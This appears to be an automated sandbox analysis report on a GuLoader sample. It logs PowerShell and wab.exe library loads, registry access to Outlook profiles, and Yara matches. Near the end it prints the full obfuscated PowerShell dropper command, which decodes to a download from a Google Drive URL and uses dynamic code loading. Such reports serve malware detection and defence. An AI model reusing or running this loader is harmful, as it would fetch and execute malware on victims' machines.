Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2411714026.0000000002F7F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb.ene source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbeW: source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regno", "0")

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.2423592720.000000000C494000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2423205589.0000000008930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2415922796.0000000005C82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Unresourceful)$global:Evaporerende = [System.Text.Encoding]::ASCII.GetString($Stamherrers)$global:Reviling=$Evaporerende.substring(295973,28447)<#Sangbgers Snkningsomraade Ultrametam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Malvastrum $Ukorrekthedens $neutralisationer), (slushing @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Udlgningens = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forskubbe)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Statcoulomb, $false).DefineType($Urationel, $Sl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Unresourceful)$global:Evaporerende = [System.Text.Encoding]::ASCII.GetString($Stamherrers)$global:Reviling=$Evaporerende.substring(295973,28447)<#Sangbgers Snkningsomraade Ultrametam

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
